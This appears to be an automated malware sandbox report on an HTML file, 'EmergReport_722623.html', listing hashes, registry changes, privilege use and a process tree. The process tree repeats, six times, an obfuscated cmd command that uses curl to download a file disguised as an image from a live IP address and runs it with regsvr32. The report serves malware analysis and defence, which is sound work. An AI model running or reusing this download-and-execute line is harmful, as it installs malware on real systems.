f8732cb1774f0dd2708f37f077bb2dbfb3e4d000e8e041165940c0a78db17e25

General

Target

EmergReport_722623.html
Size

6KB
MD5

3dcdd230925500c73cebb38f49944529
SHA1

bb1a4d6d4fc178024b2052cf9b593fcf585a4fad
SHA256

bff5cf2ca7959cd062c426f37c209ba6a92e948a73e897fac30309c956e80c1f
SHA512

a39baac7dee1362db9b894f60161b71b9c7313b876ed86eab8ceb9dd192526fcf6f30875fbcb93d5bf51f3946314cd74f7c6c2218b69590d4fc88e172e219921

Score

1^/10

Malware Config

Signatures

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 30832cf0b18fd801	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "363709719"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000962422cf799f2f46a7e75b376cef3c3c00000000020000000000106600000001000020000000c467816fa53ba6dfd0facdc0ff6ede1c9e4b23fb75d1006541f3162001bde6aa000000000e8000000002000020000000d0992752486153a3131302ef5ee42881a264d0836baf77c244c8b6d7733c70ad90000000cb6e68c05304234de6550942058f1e0d6ba85425552208d89d9b26e1780b9c92825a3a83553bef17a34d1dd7bbc74541c0e930fd3792c5c6227e9b671350c3663ae385cfdc3432d226e788bfac947dc2ffc18b26b0122526f87ee8dddc460e8e2fe7b16d64380d3078d4f0909425b7e25324e8e1942c2b446bbda494d2171f64810bcb8a79d14560eeab1e00d4b8337d40000000947af4b2768b37478b84ee99fd8c2c83e88718aec7aae3d853ad72c511f0761964bd67c2eeaf90643811b9869ed7b0794090b94800970ada0dfbdbd142de2867	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70476102b28fd801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000962422cf799f2f46a7e75b376cef3c3c0000000002000000000010660000000100002000000006507c100f96d9cd67f71f5f72cc0bfb6e7e81dc5d0631269dcfa94c91ee6c31000000000e8000000002000020000000bb06a0db2023043d4cfaa4a6ee45a8c7acb1e29f19e658173371cb5a4a2ecea9200000000a8e30f7153d1f66508352afc5fc22027585022249c0032b665cf560df9ea558400000003b23ab33b37d92f1d8cea135886391a4ca7ede3a916526cb9a99a6be3f649cb6c2132fedace5279e7017de629dc696e2f6c3c5a7297556d139eff76dc51955b3	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2AFE5791-FBA5-11EC-99E8-F2D3CC06C800} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe

Modifies registry class 2 IoCs

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_Classes\Local Settings	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache	iexplore.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2012 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

iexplore.exe

pid process

1980 iexplore.exe

pid	process
2012	powershell.exe

pid	process
1980	iexplore.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

7zG.exeAUDIODG.EXEpowershell.exe

description	pid	process
Token: SeRestorePrivilege	1508	7zG.exe
Token: 35	1508	7zG.exe
Token: SeSecurityPrivilege	1508	7zG.exe
Token: SeSecurityPrivilege	1508	7zG.exe
Token: 33	792	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	792	AUDIODG.EXE
Token: 33	792	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	792	AUDIODG.EXE
Token: SeDebugPrivilege	2012	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

iexplore.exe7zG.exe

pid process

1980 iexplore.exe
1980 iexplore.exe
1508 7zG.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

1980 iexplore.exe
1980 iexplore.exe
1048 IEXPLORE.EXE
1048 IEXPLORE.EXE
1048 IEXPLORE.EXE
1048 IEXPLORE.EXE

pid	process
1980	iexplore.exe
1980	iexplore.exe
1508	7zG.exe

pid	process
1980	iexplore.exe
1980	iexplore.exe
1048	IEXPLORE.EXE
1048	IEXPLORE.EXE
1048	IEXPLORE.EXE
1048	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

iexplore.exe

description	pid	process	target process
PID 1980 wrote to memory of 1048	1980	iexplore.exe	IEXPLORE.EXE
PID 1980 wrote to memory of 1048	1980	iexplore.exe	IEXPLORE.EXE
PID 1980 wrote to memory of 1048	1980	iexplore.exe	IEXPLORE.EXE
PID 1980 wrote to memory of 1048	1980	iexplore.exe	IEXPLORE.EXE

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\EmergReport_722623.html
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1980

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1980 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1048

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\EmergReport_722623\" -spe -an -ai#7zMap30767:98:7zEvent7277
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1508

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x548
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\Admin\AppData\Local\Temp\butThinkWe.png http://194.36.189.211/likeBeThat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\Admin\AppData\Local\Temp\butThinkWe.png
1⤵
PID:524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\Admin\AppData\Local\Temp\butThinkWe.png http://194.36.189.211/likeBeThat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\Admin\AppData\Local\Temp\butThinkWe.png
1⤵
PID:1116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\Admin\AppData\Local\Temp\butThinkWe.png http://194.36.189.211/likeBeThat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\Admin\AppData\Local\Temp\butThinkWe.png
1⤵
PID:1916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\Admin\AppData\Local\Temp\butThinkWe.png http://194.36.189.211/likeBeThat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\Admin\AppData\Local\Temp\butThinkWe.png
1⤵
PID:1712

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\Admin\AppData\Local\Temp\butThinkWe.png http://194.36.189.211/likeBeThat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\Admin\AppData\Local\Temp\butThinkWe.png
1⤵
PID:1424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\Admin\AppData\Local\Temp\butThinkWe.png http://194.36.189.211/likeBeThat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\Admin\AppData\Local\Temp\butThinkWe.png
1⤵
PID:1616

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
PID:1708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\D8I13UW4.txt
Filesize
603B

MD5
0f41e43dc8a938c9a67cb1d3b0e8ff95

SHA1
7b42b1bcf6d51e51b783704a24547af82eccb2a3

SHA256
cf865687b72cc846f550cb29d0aae47ee8ffc0d561b3801d670e4c3eb2652d51

SHA512
6949b6889ab018cbf620a2e7e6593a81073394adfae1da482b902e936a7ad3e90f2cbcbfa28eaf4240a0844ac13e6d5593ff8c5d8904332a74da644f2f9eff56

Download Submit
C:\Users\Admin\Downloads\EmergReport_722623.zip.y4alqdh.partial
Filesize
1KB

MD5
4d739d86d31bdd6809db775483b17445

SHA1
f64542a4d219dbc82a714f24d367eb43ab35e529

SHA256
a95e23e735e11ac6ad3e030a2eef354c77c4650f9e3bddde0fca39d3b45d0dc3

SHA512
b536fd4abbd566e4654e14d87f4a784b89000608224ccd12bdfe8165d7018b2a1e08ea9859af3ae70eab105604ae537ed579edc01fb19eb9d3b00ca65f9a4ed7

Download Submit
memory/1508-56-0x000007FEFC2F1000-0x000007FEFC2F3000-memory.dmp

Filesize
8KB

Download
memory/2012-59-0x000007FEF3820000-0x000007FEF4243000-memory.dmp

Filesize
10.1MB

Download
memory/2012-61-0x0000000002924000-0x0000000002927000-memory.dmp

Filesize
12KB

Download
memory/2012-60-0x000007FEF2CC0000-0x000007FEF381D000-memory.dmp

Filesize
11.4MB

Download
memory/2012-62-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/2012-63-0x000000000292B000-0x000000000294A000-memory.dmp

Filesize
124KB

Download
memory/2012-64-0x0000000002924000-0x0000000002927000-memory.dmp

Filesize
12KB

Download
memory/2012-65-0x000000000292B000-0x000000000294A000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads